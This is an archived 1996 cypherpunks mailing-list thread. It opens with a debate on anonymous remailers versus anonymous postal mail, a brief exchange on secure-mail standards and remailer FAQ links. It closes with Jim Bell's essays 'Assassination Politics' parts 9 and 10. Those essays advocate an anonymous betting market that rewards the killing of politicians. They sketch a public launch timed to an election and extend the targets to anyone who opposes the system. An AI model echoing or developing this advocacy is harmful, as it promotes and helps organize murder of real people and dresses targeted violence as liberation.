From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tbyfield@panix.com (t byfield)
Date: Thu, 29 Feb 1996 09:45:23 +0800
To: paul@strassmann.com
Subject: Re: Strassmann's  Anonymous Remailers Paper
Message-ID: <v02120d0aad5a771d4753@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


A few observations on Paul Strassman's response to John R. Levine; I've
rearranged it a bit for clarity, edited out a handful of lines, and
whittled down the CCs.

At 4:01 PM 2/28/96, Paul A. Strassmann wrote:

John R. Levine:
> >It's been possible for at least a century to mail letters with no
> >return address.  It's equally possible to use post office boxes and
> >mail drops, or even a chain of mail drops, to have two-way exchanges
> >of messages between people who don't know each other's identities.
> >
> >As far as I can tell, the existence of anonymous postal mail hasn't
> >caused any great trouble over the past century.  Can you explain why
> >the appearance of similar facilities for on-line mail presents a
> >greater problem?

Paul Strassmann:
>Since the idea that Internet remailers are not much different than
>anonymous letters sent by mail is an often repeated theme, it warrants a
>comment:
>
>1. Your statement that anonymous post mail hasn't caused any "great
>trouble" over the past century does not stand up well. I have not done a
>statistical sampling of incidents, but I wish to note that all my exposures
>(personal and otherwise) to anonymous post have been associated with
>extortion, spreading of unwarranted rumors and unsubstantiated accusations.
>Most ransom notes in kidnapping cases have been conveyed by this means.

        Obviously, kidnapping and extortion demands sent anonymously
through the post would attract far more attention than innocuous uses
would--as did the recent incident in which someone donated (by anonymous
mail) a million-dollar McDonald's sweepstakes ticket to a children's
hospital. I daresay that for every such criminal instance you could cite,
there are hundreds or even thousands of instances of completely benign
"secret santas" and anonymous valentines from teenage "secret admirers,"
for example--which would hardly bear out your claim that

>In civilized  society the receipt of anonymous post has been always
>associated with unacceptable social behavior. That reputation persists.

        Valentines and gifts sent anonymously will no doubt strike some
people as trivial in the face of "information warfare" and other such
gothic notions, and perhaps they are; but I can only wonder what exactly
these valiant strategists think they're protecting and from whom they're
protecting it.



>2. Your assertion that one can be equally anonymous by post as with e-mail
>does not stand up.
>
>First, anonymous mail is likely to carry stamp cancellation marks, which
>provides an important clue as to the origin of the message.
>
>Second, criminal  forensic techniques have been used very successfully in
>tracing identifying marks, such as typewriter characteristics, Xerox copy
>drum defects and other tricks such as genetic identifications of saliva
>remnants left from licking a stamp or sealing the envelope. There are many
>others. Anonymous e-mail does not convey such clues.
>
>Third, anonymous mail operates on a totally different scale and with a
>different technology than post. The fact that automobiles were originally
>called "horseless carriages" does not make them possess the attributes of
>horse-carriages. When technology scales up from thousands to hundred
>millions, the potential consequences are not subject to simple
>extrapolation.

        By the same token, the fact that law enforcement agencies have,
over the last two centuries, developed the forms of forensic analysis you
mention doesn't mean that these techniques are a god-given right whose
shortcomings in the face of new technologies need to be compensated for.
These techniques are, as you point out, contingent on the traits peculiar
to the objects being examined. Postal mail consists of integral physical
objects which can bear these kinds of traces; email does not. Nor does
shouting--yet I've never heard anyone suggest that fans at a football game
should preface what they yell with their name and their address, or that
their failure to do so constitutes a threat to national security.



>3. Anonymous remailers have been conduits for misconduct ranging from
>"spamming" - e.g. launching thousands of messages to saturate server
>capacity - to massive distribution of "sniffers" that make a number of
>software-based fire-walls inoperative.

        This objection remailers is a red herring: giveaway ten-hour
accounts on AOL and other services, hacked accounts, accounts obtained
under false names, and accounts obtained under a True Name are much more
notorious sources of spam than are remailers. If spam is your objection,
you're barking up the wrong tree.
        As for the "massive deployment of 'sniffers'," anyone capable of
doing this or of using information gained by this means hardly needs
remailers.



>4. The most likely scenarios of an information assault on the information
>infrastructure that performs essential social functions such as message
>switching, transportation dispatching, public security communications, etc.
>always commences with a  saturation dispatch of a wide variety of
>intelligent agent via anonymous remailers.

        "Most likely scenarios" are speculative: something that hasn't
happened yet doesn't "always commence with" anything.



>There is a long list of anti-social and criminal behavior that is greatly
>facilitated by a guarantee of untraceability. The repertoire of such
>malfeasances is sufficiently long that it does not warrant further elaboration.

        This chicken-or-egg formulation suggests that a milieu in which
total traceability is possible would greatly diminish criminal behaviors
and activity. Perhaps, but as you yourself have pointed out, such a milieu
is utterly antithetical to anything remotely resembling a free democracy.
Since the alternative to untraceability isn't viable, there's no point in
bringing it up.



>Now, I would like to repeat that I believe that anonymous remailers are
>here to stay - at least in democratic societies. However, that does not
>mean that one should continue insisting that anonymous remailes are not a
>different phenomenon than an envelope containing a message that does not
>have a return address.

        If you were the final arbiter on the question, your repeated claim
that "remailers are here to stay" would be much more comforting.
Unfortunately, the force of almost all your arguments is, in a nutshell,
that remailers are associated with and facilitate criminal and/or terrorist
activities--and that suggests to me that if you had your druthers, they
would be illegalized.
        I'm curious: Do you or do you not support the continued existence
of nonregulated, nonlicensed, and publicly accessible remailers? (Please
note that this is a different question than "Are remailers here to stay?")


regards
Ted Byfield






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Housley, Russ" <housley@spyrus.com>
Date: Thu, 29 Feb 1996 17:17:59 +0800
To: "Blake Ramsdell" <Blaker@msn.com>
Subject: Re:
Message-ID: <9601288255.AA825567648@spysouth.spyrus.com>
MIME-Version: 1.0
Content-Type: text/plain



Blake:

At least three companies have MSP implementations that can be liscensed.

Russ

______________________________ Reply Separator _________________________________
Subject: RE: 
Author:  "Blake Ramsdell" <Blaker@msn.com> at internet
Date:    2/28/96 12:19 AM


> Further there is a good implementation of MOSS.  It was even announced at 
> the workshop.  Did you miss it?  TIS has done an implementation that is
> available for anonymous FTP, albeit only within the US.  It's integrated
> with MH, not the most favored mail user agent, but the current version has 
> shell scripts that perform minimal MIME functions to facilitate integration 
> with other agents.

Is there a version that can be used in commercial applications?  There is for 
PGP, S/MIME, and (I think) for MSP.  From a developer's point of view, this 
will influence my decision between specifications.

Blake




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "David K. Merriman" <merriman@arn.net>
Date: Thu, 29 Feb 1996 11:57:03 +0800
To: cypherpunks@toad.com
Subject: Re: Cypherpunk remailer
Message-ID: <2.2.32.19960228151842.00679edc@arn.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 05:34 PM 02/28/96 -0800, cmca@alpha.c2.org (Chris McAuliffe) wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>[To: cypherpunks@toad.com]
>[Subject: Re: Cypherpunk remailer]
>[In-reply-to: Your message of Wed, 28 Feb 96 13:06:19 N.]
>             <427.6632T768T557@eniac.campus.luth.se>
>
>johan@eniac.campus.luth.se (Johan Sandberg) requested:
>>How do I send Email through a cypherpunk remailer?
>>There might be some FAQs about this, but never seen one.
>> -- Please refer to where I can get the FAQ if there is one! --
>
>There is a FAQ about anonymous remailers by
><A HREF="http://www.well.com/user/abacard/remail.html>Andre Bacard</A>.
>
Alex de Joode has a nice entry-level explanation of how to use remailers (and chaining) at:

http://www.replay.com/people/usura/chain.html

HTH

Dave Merriman

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTRVrMVrTvyYOzAZAQHqawP/fOAciPC+eESCKkE9dQEE5OnZsPK9L8BM
VX4FYOKis7NYN7qrZ1wN3v8RtUER5/OvV/RFyeLE32aKta/MMUHTLM//EvfgHljQ
S+g4WeeLhdafNgH5ZoHV5PGYk2tRazgQszG0BeamI+HB4WdhU8tktAcTWavSmQuY
X5dQizSETTg=
=PtlJ
-----END PGP SIGNATURE-----
-------------------------------------------------------------
"Giving money and power to government is like giving 
whiskey and car keys to teenage boys."
                    P. J. O'Rourke (b. 1947), U.S. journalist.
<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>
For privacy tools: http://www.geocities.com/capitolhill/1148






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 29 Feb 1996 18:48:46 +0800
To: cypherpunks@toad.com
Subject: Assassination Politics 9!
Message-ID: <m0ts143-00090tC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

"Assassination Politics" Part 9, by Jim Bell, February 27, 1996

For about a year I have been considering the implications of "Assassination 
Politics," and for more than six months I've been sharing the subject and my 
musings with you, the interested reader.  I've also been debating the issue 
with all comers, a self-selected bunch who range from enthusiastic 
proponents to clueless critics.  Ironically, some of you have even chided me 
for "wasting time" with some of the less perceptive among my numerous 
"opponents."  In defense, my response has always been that when I respond to 
a person, I do it not primarily for his benefit, but for others who might be 
fence-sitting and are waiting to see if my idea will break down anywhere. 

If there is anything which has fascinated me as much as the original idea, 
it is this vast and dramatic disparity between these  various responses.  
It's been called everything from "a work of genius" to "atrocious," and 
probably much worse!  Clearly, there must be a fundamental, social issue 
here that needs to be resolved.

While nobody has quite yet said it in those terms, I'm sure that more than 
one of you have probably wanted to react to my prose with the line, "See a 
shrink!"  [American slang for a psychriatrist, for the international readers 
out there.]  Well, in a sense that's exactly what I did, but the "shrink" I 
"saw" had been dead for over five  decades:  Sigmund Freud.  Much to my 
surprise, I was handed a copy of a book, Introduction to Great Books (ISBN 
0-945159-97-8) which contained (page 7) a letter from Freud to Albert 
Einstein.  On page 6, there is an introduction, describing the reason for 
this communication.   It says:

"In 1932, the League of Nations asked Albert Einstein to choose a problem of 
interest to him and to exchange views with someone about it.  Einstein chose 
"Is there any way of delivering mankind from the menace of war?" as his 
problem and Sigmund Freud as his correspondent.  In his letter to Freud, 
Einstein said that one way of eliminating war was to establish a 
supranational organization with the authority to settle disputes between 
nationas and power to enforce its decisions.  But Einstein acknowledged that 
this solution dealt only with the administrative aspect of the problem, and 
that international security could never be achieved until more was known 
about human psychology.  Must right always be supported by might?  Was 
everyone susceptible to feelings of hate and destructiveness?  It was to 
these questions Freud addressed himself in his reply."  

Interestingly enough, when I first started thinking about the idea that I 
would later term "Assassination Politics," I was not intending to design a 
system that had the capability to eliminate war and militaries.  What I was 
targeting, primarily, was political tyranny.  By my standards, that included 
not merely totalitarian governments but also ones that many of us would 
consider far more benign, in particular the Federal government of the United 
States of America, "my" country.  Only after I had thought of the 
fundamental principle of allowing large numbers of citizens to do away with 
unwanted politicians was I "forced," by my work up to that point, to address 
the issue of the logical consequences of the operation of that system, which 
(by "traditional" ways of thinking) would leave this country without 
leaders, or a government, or a military, in a world with many threats.  I 
was left with the same fundamental problem that's plagued the libertarian 
analysis of forming a country in a world dominated by non-libertarian 
states:  It was not clear how such a country could defend itself from 
agression if it could not force its citizens to fight.

Only then did I realize that if this system could work within a single 
country, it could also work worldwide, eliminating threats from outside the 
country as well as corrupt politicians within.  And shortly thereafter, I 
realized that not only could this occur, such a spread was absolutely 
inevitable, by the very nature of modern communications across the Internet, 
or older technologies such as the telephone, fax, or even letters written on 
paper.  In short, no war need ever occur again, because no dispute would 
ever involve more than a tiny number of people at any one time.  Further, no 
tyrant would ever be able to rise to the level of leader, leading his 
country into a destructive war against the wishes of his more reasonable 
citizens.  He would be opposed, logically enough, by the citizens of the 
country he intended to war with, obviously, but he would also draw the ire 
of citizens within his own country who either didn't want to pay the taxes 
to support a wasteful war, or lose their sons and daughters in pointless 
battles, or for that matter were simply opposed to participating in the 
agression.  Together, all these potentially-affected peoples would unite 
(albeit quite anonymously, even from each other) and destroy the tyrant 
before he had the opportunity to make the war.

I was utterly astonished.  Seemingly, and without intending to do so, I had 
provided a solution for the "war" problem that has plagued mankind for 
millennia.  But had I?  I really don't know.  I do know, however, that very 
few people have challenged me on this particular claim, despite what would 
normally appear to be its vast improbability.  While some of the less 
perceptive critics of "Assassination Politics" have accused me of 
eliminating war and replace it with something that will end up being worse, 
it is truly amazing that more people haven't berated me for not only 
believing in the impossible, but also believing that the impossible is now 
actually inevitable!

A little more than a week ago, I was handed this book, and asked to read 
Freud's letter, by a person who was aware of my "little" philosophical 
quandary.  I began to read Freud's letter in response to Einstein, having 
never read any other word Freud had written, and  having read essentially 
none of the works of the giants of Philosophy.  (Now, of course, I feel 
tremendously guilty at the omission in my education, but I've always been 
attracted more to the "hard sciences," like chemistry, physics, mathematics, 
electronics, and computers.)  Since this letter was specifically on war, and 
the question of  whether man could ever avoid it, I felt perhaps it would 
contain some fact or argument that would correct what was simply a 
temporary, false impression in my mind. Simultaneously, I was hopeful that I 
might end up being right, but alternatively hoped that if wrong, I would be 
soon corrected.  I was fearful that I was wrong, but also fearful that there 
would be nothing in this essay that would assist me in my analysis of the 
situation.  

About a third of the way through Freud's letter, I had my answer.  Below, I 
show a segment of Freud's reply, perhaps saving the whole letter for 
inclusion into a later part of this ongoing essay.  While I could 
drastically oversimplify the situation and state, "Freud was wrong!," it 
turns out that this brief conclusion is at best highly misleading and at 
worst flirting with dishonesty.  By far the greater part of Freud's analysis 
makes a great deal of sense to me, and I would say he's probably correct.  
But it is at one point that I believe he goes just a bit wrong, although for 
reasons which are entirely understandable and even predictable, given the 
age in which he lived.  It must be remembered, for example, that Freud was 
born into an era where the telephone was a new invention, broadcast radio 
was non-existent, and newspapers were the primary means that news was 
communicated to the public.  It would be highly unreasonable for us to have 
expected Freud to have anticipated developments such as the Internet, 
anonymous digital cash, and good public-key encryption. 

In some sense, at that point, my biggest regret was that I couldn't discuss 
the issue with either of these two communicants, Freud having died in 1939, 
and Einstein in 1955, after having helped initiate research that led to the 
development of the atomic bomb, the weapon that for decades and even now, 
makes it absolutely, vitally important to eliminate the possibility of war 
from the world.

 But I'll let Dr. Freud speak, as he spoke over sixty years ago, because he 
has much to say:

"Such then, was the original state of things:  domination by whoever had the 
greater might--domination by brute violence or by violence supported by 
intellect.  As we know, this regime was altered in the course of evolution.  
There was a path that led from violence to right or law.  What was that 
path?  It is my belief that there was only one:  the path which led by way 
of the fact that the superior strength of a single individual could be 
rivaled by the union of several weak ones.  "L'union fait la force." 
[French; In union there is strength.]  Violence could be broken by union, 
and the power of those who were united now represented law in contrast to 
the violence of the single individual.  Thus we see that right is the might 
of a community.  It is still violence, ready to be directed against any 
individual who resists it; it works by the same methods and follows the same 
purposes.  The only real difference lies in the fact that what prevails is 
no longer the violence of an individual but that of a community."

[But below is where I think Freud falls into a certain degree of error, 
perhaps not by the standards and realities of _his_ day, but those of ours.  
My comments are in square brackets, [], and Freud's comments are quoted "".  
 Freud continues: ]

"But in order that the transition from violence to this new right or justice 
may be effected, one psychological condition must be fulfilled.  The union 
of the majority must be a stable and lasting one.   If it were only brought 
about for the purpose of combating a single dominant individual and were 
dissolved after his defeat, nothing would be accomplished. The next person 
who though himself superior in strength would once more seek to set up a 
dominion by violence and the game would be repeated ad infinitum.  The 
community must be maintained permanently, must be organized, must draw up 
regulations to anticipate the risk of rebellion and must institute 
authorities to see that those regulations--the laws-- are respected and to 
superintend the execution of legal acts of violence.  The recognition of a 
community of interests such as these leads to the growth of emotional ties 
between the members of a united group of people--communal feelings which are 
the true source of its strength."     [end of Freud's quote]


[Those of you who truly comprehend the idea of "Assassination Politics" 
will, I'm confident, understand exactly why I considered this segment of 
Freud's letter to be important enough to include, and will probably also 
recognize why I consider Freud's analysis to go wrong, albeit for 
comparatively minor and understandable reasons.  I will address the last 
paragraph in greater detail, to explain what I mean.  I will repeat Freud's 
words, and address each of his points from the standpoint of today's 
situation and technology.]

"But in order that the transition from violence to this new right or justice 
may be effected, one psychological condition must be fulfilled.  The union 
of the majority must be a stable and lasting one." 

[In a sense, Freud is absolutely correct:  Whatever system is chosen to 
"govern" a society, it must continue to operate "forever." ]  Freud continues:

" If it were only brought about for the purpose of combating a single 
dominant individual and were dissolved after his defeat, nothing would be 
accomplished."

[This is where the problem begins to creep in.  Freud is leading up to 
justifying the existence of a formal government as he knew them in the 
1930's, based on the continuing need for keeping the peace.  The first, and 
I think, the most obvious problem is that Freud seems to implicitly assume 
that the purpose of the union will actually be fulfilled by the formation of 
a government.  Freud, who died in 1939, didn't see what his survivors saw, a 
"legitimate" government in Germany having killed millions of people in the 
Holocaust, or many other incidents subsequent to that.  And Freud, whose 
letter was written in 1932, was probably not aware of the slaughter of the 
Russian Kulaks in the late 1920's and early 1930's, or the purges which 
followed.  Freud could have felt, generally, that the problems with a 
country's governance were caused either by inadequate government or simply a 
rare example of government gone bad.  We know, to the contrary, that 
governments very frequently "go bad," in the sense of violating citizen's 
rights and abusing the power entrusted to them.  Few may end up killing 
millions, but to assume that we must continue to tolerate governments just 
because they don't go quite as far as Nazi Germany would be foolish in the 
extreme.]

[The second problem is the implicit assumption that the long-term control he 
(correctly) sees MUST come from an organization like a traditional 
government.  True, in the era in which Freud lived, that conclusion made a 
great deal of sense, because a well-functioning government appeared superior 
to none at all.  And it was at least plausible that such control COULD come 
from a government.  But as the old saying goes, "Power corrupts, and 
absolute power corrupts absolutely."] 

[To use a house's thermostat as an analogy, but differently than I did in 
"Assassination Politics part 6," a person who lived in an era before 
automatic furnace thermostats would always conclude that a person's efforts 
would have to be continually directed towards maintaining an even 
temperature in his house, by adding fuel or limiting it, by adding more air 
or restricting, etc.  To the extent that this manual control constitutes a 
"government," he will believe that this hands-on control will always be 
necessary.  But we now live in a time where a person's time is rarely 
directed towards this effort, the function having been taken over by 
automatic thermostats which are cheap, reliable, and accurate.  They are 
also, incidentally, essentially "uncorruptible," in the sense that they 
don't fail except for "understandable" reasons, and repair is cheap and 
easy.  (And a thermostat can never be bribed, or get tired, or have its own 
interests at heart and begin to subvert your own commands.)   Quite simply, 
the progress of technology has put control of temperature in the hands of an 
automatic, error-free system that is so reliable as to be ignorable most of 
the time.]

[I argue that likewise, the progress of technology would allow an automatic 
system to be set up, which I called "Assassination Politics" (but could 
probably use a more apt name, since its application extends far beyond the 
issue of politics) different from traditional government, a difference 
somewhat analogous to the difference between a person's full-time efforts 
and an automatic thermostat.  Aside from the dramatic reduction in effort 
involved, an automatic system would eliminate the errors caused by 
inattention by the operator, such as leaving, falling asleep, or other 
temporary lack of concentration.  These failures are somewhat analogous to 
the failure or misbehavior of a corruptible or indifferent or even a 
malicious government.]  

[This makes a government like Freud saw totally unnecessary.  Of course, 
Freud could not have anticipated the technological developments that would 
make an "automatic" replacement for government even possible, and thus he 
followed his contemporary paradigms and sought to justify the governments as 
they then existed.]  Freud continues:

"The next person who thought himself superior in strength would once more 
seek to set up a dominion by violence and the game would be repeated ad 
infinitum."

[This statement is correct, but I think it misses the point:  Many functions 
of individuals and machines are never "completed", and must "be repeated ad 
infinitum."  (The most basic example:  If we are optimistic about the future 
of the human race, by definition reproduction and survival must be "repeated 
ad infinitum.")   That does not mean that the mechanism which handles that 
need must be any more complicated that the minimum necessary to achieve the 
control needed.  I agree that a system of long-term control is necessary; 
where I disagree with Freud is simply that I believe that a vastly better 
method of control now can potentially exist than the traditional governments 
that he 
knew.  To the extent that he couldn't have anticipated the Internet, 
anonymous digital cash, and good encryption, he had no reason to believe 
that government could be "automated" and taken out of the hands of a tiny 
fraction of the population, a fraction which is corruptible, malicious, and 
self-interested.  Also, by not being aware of modern technology, he is 
unaware how easy it has become, conceptually, for people to come together 
for their self-defense, if that self-defense required only a few kilobytes 
be sent over fiber-optic cables to a central registry.  Freud's objection to 
an "endlessly repeating" system breaks down in this case, so his conclusion 
need not be considered valid.]


Freud continues:

"The community must be maintained permanently, must be organized, must draw 
up regulations to anticipate the risk of rebellion and must institute 
authorities to see that those regulations--the laws-- are respected and to 
superintend the execution of legal acts of violence."


[Again, I think Freud misses the point.  He refers to "the risk of 
rebellion," but I think he forgets that the main reason for "rebellion" is 
the abuse by the government then in control. (Naturally, it looks 
differently from the standpoint of that government!)   If the latter problem 
could be eliminated, "rebellion" would simply never occur, for there would 
be no reason for it.  If those that were "rebelling" were in the wrong, 
violating somebody's rights, then my "Assassination Politics" system would 
be able to take care of it.  This, presumably and understandably, Freud 
could never have foreseen. Also, Freud does not address the question of 
whether or not the government which promulgates those laws is doing so in a way
primarily for the benefit of the public, or those who populate the 
government itself. Graft was well known if Freud's time; it seems to me that 
he should have addressed the question of whether or not an entity called a 
"government" could actually achieve the benefits he claims justify the 
government, without being subverted by those who control it, for their own 
interests.  If not, then there is certainly a issue to be addressed:  At 
what point do the depradations of a parasitic government exceed its 
benefits?  And can we find a way to do without it?]  Freud continues:


"The recognition of a community of interests such as these leads to the 
growth of emotional ties between the members of a united group of 
people--communal feelings which are the true source of its strength."     
[this is end of the portion of Freud's letter which I quote here.]

One of the interesting things about this statement is that it is the 
development of tools such as the Internet which will be eliminating the very 
concept of "foreign" and "foreigner."  They will become artificial 
distinctions.  There is clearly much precedent for this, from the country in 
which I live, America.  When formed, it contained people whose primary 
loyalty was to their _state,_ not to the Federal government as a whole. Even 
our civil war, from 1861 to 1865, was based on loyalty to states or regions, 
rather than the country as a whole.   To cite just one example, myself, 
while I reside in the state called Washington, I've lived in a number of 
other states, but I don't consider myself loyal to any particular state.  
(Perhaps using myself as an example is misleading, because at this point I 
don't consider myself "loyal" to any government at all!)

In fact, later in Freud's letter, he says, "Anything that encourages the 
growth of emotional ties between men must operate against war."  Sadly, 
Freud did not live to see the development of the Internet, and the massive 
international communication which it has already begun to foster.  In _his_ 
day, the ordinary people of one country and another rarely communicated, 
except perhaps for letters with relatives from "the old country" that 
emigrated.  The idea of going to war with people from whom you get email on 
a daily basis is, in itself, a "foreign concept" to me, and I hope it will 
remain so!  In that sense, Freud was very right:  "Assassination Politics" 
active or not, it will be much harder for governments to whip up their 
citizens into a frenzy to kill the enemy if they can type to them every day.

Frustratingly left unanswered is a question whose answer I'd like to know:  
Could I have convinced Freud, or Einstein, that "Assassination Politics" is 
not only a necessary or even an unavoidable system, but also a GOOD one?  
Could I convince them today, had they miraculously survived until today, 
aware of the last 64 years of history subsequent to their correspondence?

Jim Bell
jimbell@pacifier.com

Klaatu Burada Nikto

Something is going to happen...      Something...Wonderful!




 



-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTU7svqHVDBboB2dAQGZSwP+It+u/ZCdtqAeF/gSlpCEt7spyF9alJkl
hBBrp1/rg0rZXrhg1ouqk1Qnz8nzxpBmg/rhkMLNx493oGoFHTETVnl5RGiuiio4
2KWewNqw2JSZ2mxkf95On267Jk9WWeJ/GLwnZ8XkI5p9fu0b55oPtBF4GezeAtTv
1gD8ipGPXFM=
=kJUj
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Thu, 29 Feb 1996 18:43:50 +0800
To: cypherpunks@toad.com
Subject: Assassination Politics 10
Message-ID: <m0ts1QU-0008xrC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Assassination Politics Part 10:  "Non-Euclidean Thinking"  by Jim Bell

An interesting communication I had recently on the subject of "Assassination 
Politics."  My commentary is preceed with >> or nothing; the other person's 
commentary starts with a ">".  The subject is how to actually implement this 
sytem, and my first comment notices the fact that despite my efforts, the 
government has not attempted to use this issue to justify some sort of 
crackdown on net rights, or anything like that.

===================
>>  I think they're actually afraid to start the debate,
>

>I think they don't believe you're a threat. 

You're probably right about this.  I guess I'll have to think of something 
to change their minds, huh? <G>

> Remember, they have incredible 
>amounts of money with which to hire bright but greedy people.  All they
have to 
>do is find the people running the "Guess the Death Date" lottery.  They would 
>have great incentive to apply their considerable resources to this end.

Your logic is excellent.  But as strange as it may seem, there may be a 
different way...  Let's see, how do I explain?  First, a little diversion
that may or 
may not be relevant to this subject, but initially won't appear to be so.

Somewhere around 20-25 years ago, I read some item concerning Howard Hughes, 
the late billionaire.  It described the history of his business ventures, in 
fields such as aircraft ("Spruce Goose" is a well-known example) but also 
mentioned that Hughes Tool was (originally?) into oil-well drilling quipment.


I don't know how much you know about about oil well drilling and drill 
bits, but they look nothing like the classic fluted drill bits common in 
hardware stores.  Oil well dril bits consist of multiple ultra-hard carbide 
points mounted on rotating shafts mounted at the end of the drill "string," 
and these shafts must be connected to the main shaft with bearings.  They 
roll around on the rock, not sliding, and they "spall" off pieces of rock 
due to enormous applied pressure.

 Oil well drilling is done by lubricating the drilling operation with what 
is called "drilling mud," which is actually a slurry of solids in water, 
which is primarily used to cool the cutter and wash away the rock chips and 
dust produced in the operation.  Now, since the rotating cutter wheels must 
spin on their axis, that means they have to be run on shafts with bearings 
installed.  These bearings cannot be perfectly sealed and thus protected 
against rock and mud dust, and their useful lifetime is strongly limited by 
their quality.  

And since every time they wear out the whole drill string has to be pulled 
from the well, that's an EXTREMELY expensive proposition for well-drillers.  
So it should not be surprising that these guys considered bearing quality to 
be very, very important.  A little improvement was worth a lot of money.

"Quality", to a bearing manufacturer, is strongly related to surface 
hardness, and traditionally, the best bearings were (and, mostly, still are) 
the hardest.  But there's a problem:  Ultimately, a very hard circular 
bearing rotating on a very hard flat surface (especially if its heavily 
loaded) applies nearly all its for on a single point (for ball bearings) or 
on a single line (for roller bearings) and that eventually causes bearing 
failure.  So there was an upper limit, generally, on how good you could get 
in bearings.  And the hardest won.  Until Hughes.

[don't go to sleep yet... it gets relevent real soon]

According to the source I read, what Hughes Tool did that made them really 
rich was quite simple and counter-intuitive:  Rather than trying to make 
_his_ bearings as HARD as you can get, he made them SOFT, very soft, "almost 
as soft as lead."   (Which, if you know anything about metals, is very soft 
indeed.)  The bearings deformed on their raceways, spreading out the load 
over a far larger area, and the resulting bearings were the best in the 
business.  (He probably also applied a lot of research into how to avoid 
"metal fatigue," but that's quite another story.)

Very counter-intuitive, but he "won" precisely because he did exactly the 
opposite of what everyone "knew" was the proper way to go.  Okay, so that 
explains a genius who later became a billionaire who later turned into a 
neurotic, or worse.  "What," you will ask, "does this all have 
to do with Assassination Politics?"

Well, to draw an observation originally posited in an an essay titled the 
"Libertech Project," about 7 years ago, libertarians (of all people) are 
"non-Euclidean thinkers."  Basically, this means that we recognize that the 
best way to go from "point A" to "point B" is NOT NECESSARILY a straight 
line.  And like Columbus, who sailed west in order to go east, sometimes it 
is necessary to sit down, and totally re-think your strategy if you're 
trying to accomplish some goal.

By "classical" thinking, "Assassination Politics" would have to be the best, 
tightest-security, more protected organization that has ever existed on the 
face of this planet.  Just about EVERY powerful person would want to kill 
anybody who had anything to do with such a system.  The codes would have to 
be unbreakable, the remailers would have to be certain, but most 
importantly, each and every participant would have to be perfectly anonymous 
to even have a prayer of pulling it off.  Especially the operators of such a 
system.  Especially them.

That's classical thinking.  And that's what I thought a few months ago.  I 
thought, "it's do-able, but it's gonna be a lot of work!"

But let's suppose, for a moment, that somebody "pulls a Hughes."  Rather
than trying 
to make the hardest bearings in the world, why doesn't somebody try to make 
the softest?  Rather than trying their darndest to stay anonymous, or wait
and let 
somebody else implement this system, why not just "let it all hang out," (as 
the saying went in the 1960's) and publicly announce that they're 
implementing this system, come hell or high water, and invite anyone who 
wants to participate to help form what will be the LAST revolution on earth, 
the one that'll take down ALL the governments.

This sounds crazy, right?  I mean, who wants to die?  Who wants to commit 
suicide just to... just to... just to... make an ENTIRE WORLD FREE FOREVER?  
Free from wars, militaries, governments, taxes, political oppression.  Free 
from the kind of totalitarian governments that existed and currently exist.  
Free from the Holocausts that have killed Jews, Cambodians, Armenians, 
Russian Kulaks, Iraqi Kurds, Chinese dissidents, Native Americans, and oh so 
many others? "Who, exactly, would be stupid enough to risk death to make the 
world free???"

Everyone who volunteered to fight to fight Hitler, to name just one example. 
Remember, or have we forgotten so soon, that occasionally people die to 
keep the rest of us free.  That's the way it's been for hundreds of years.  
The United States of America was founded by people who risked death to shake 
off the yoke of a government that was, by the standards of the day, not 
particularly bad.  

Think about it.  Somebody had to be the first one to start banging on the 
Berlin Wall, with a sledgehammer,  in 1989.  Somebody had to be the first to 
walk through.  Somebody had to be the first to stand up and say, "Enough!"  
And the ironic thing is, the most strangely unusual thing, is that the 
entire Eastern Bloc fell, almost bloodlessly, in a couple weeks, because one 
by one everybody realized that all that's sometimes required is to finally 
stand up and be counted, and to just say no to the government.  When the 
time was right, all it took was a slight push and the dominoes tumbled down. 

Now, don't get me wrong.  I'm not suggesting that EVERYONE would be 
identified.  The "donors" to the system would remain perfectly anonymous, 
and the "guessers" would likewise be perfectly anonymous, but the 
organization itself would be made up of real people, who have published 
addresses, who have simply decided that they have had enough of the current 
system and are going to participate in a PERFECTLY LEGAL enterprise by the 
laws of the country, and just DARE the government to try to stop them.

The organization wouldn't have to buy ads; the publicity firestorm would be 
enormous.  Suddenly, all the politicians would be put on the spot!  Instead 
of being asked by the reporters for their position on the economy, 
pollution, the budget deficit, or some other thing, they'll ask, "Why should 
the public NOT want to see you dead?"

When would be the best time to do it?  Why, during a major political 
campaign!  When Congress is out of session, and they can't pass
legislation without calling some sort of emergency session.  But it won't 
matter anyway, for a few weeks the organization doesn't actually have to 
take bets or make payments, they'll merely publicize their efforts for all 
to see.  To reassure the public, they could announce that they'll only take 
bets on elected and appointed political officeholders...and anyone who tries 
to stop the system.   And the politicians will be scurrying around, looking 
for political cover, trying to figure out how to NOT look scared, but at the 
same time each is wondering if he'll be the first to go.  And all the while, 
the public will be loving it, laughing at the efforts of the politicos to 
cover their collective asses, and taking private bets among themselves on 
who will be the first one to die.

Prosecute the participants?  On what charge?  "Conspiracy to commit 
gambling"?  Which prosecutor would risk appearing to be impeding the 
progress of a useful system?   At that point, the organization's members will 
just be publicly exercising their first-amendment rights.  Which judge would 
take the case?  Now THEY'RE on the spot, THEY have to decide what to do.  I 
contend that in an election year, before the election, there would be mass 
resignations from Congress, or members deciding "it's just not fun anymore" 
and decline to return even if re-elected, as well as the complete loss of 
whatever residual confidence the public has in the government. 

Whew!  Is this all just wishful thinking?  I really don't know!  


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMTVAT/qHVDBboB2dAQH5+gQAlbi5M1+fHOaX/jSz1dDkNWRe3bStYWNa
pzFPLcgBRnTpR9bAmq+BtTWdv5mPkUpHGK1G90nGM5u+nB3h+AUta6vvQqzvCXPb
